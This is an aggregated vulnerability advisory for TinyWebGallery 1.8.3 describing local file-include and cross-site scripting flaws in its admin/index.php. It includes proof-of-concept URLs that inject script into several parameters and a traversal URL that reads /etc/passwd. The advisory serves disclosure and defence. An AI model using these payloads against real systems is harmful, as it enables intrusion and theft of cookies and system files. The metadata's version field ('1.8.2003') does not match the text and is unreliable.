TinyWebGallery Local File-Include and Cross-Site Scripting Vulnerabilities

vendor:

TinyWebGallery

by:

SecurityFocus

6.4

CVSS

MEDIUM

Directory Traversal

CWE

Product Name: TinyWebGallery

Affected Version From: 1.8.2003

Affected Version To: 1.8.2003

Patch Exists: YES

Related CWE: N/A

CPE: a:tinywebgallery:tinywebgallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

TinyWebGallery Local File-Include and Cross-Site Scripting Vulnerabilities

TinyWebGallery is prone to local file-include and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. A remote attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Exploiting the local file-include issue allows the attacker to view and subsequently execute local files within the context of the webserver process.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46086/info

TinyWebGallery is prone to local file-include and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

A remote attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Exploiting the local file-include issue allows the attacker to view and subsequently execute local files within the context of the webserver process.

TinyWebGallery 1.8.3 is vulnerable; other versions may also be affected. 

xamples:
http://www.example.com/twg183/admin/index.php?sview="onmouseover=alert(String.fromCharCode(88,83,83));"
http://www.example.com/twg183/admin/index.php?tview="onmouseover=alert(String.fromCharCode(88,83,83));"
http://www.example.com/twg183/admin/index.php?dir=<script>alert("xss")</script>
http://www.example.com/twg183/admin/index.php?action=chmod&item=<script>alert("xss")</script>
http://www.example.com/twg183/twg183/admin/index.php?action=chmod&item="><script>alert("xss")</script>
...

--

Vulnerability: Directory Traversal.
Where:
~ File: /admin/index.php
~ Parameters: item

Example:
http://www.example.com/twg183/admin/index.php?action=edit&item=../../../etc/passwd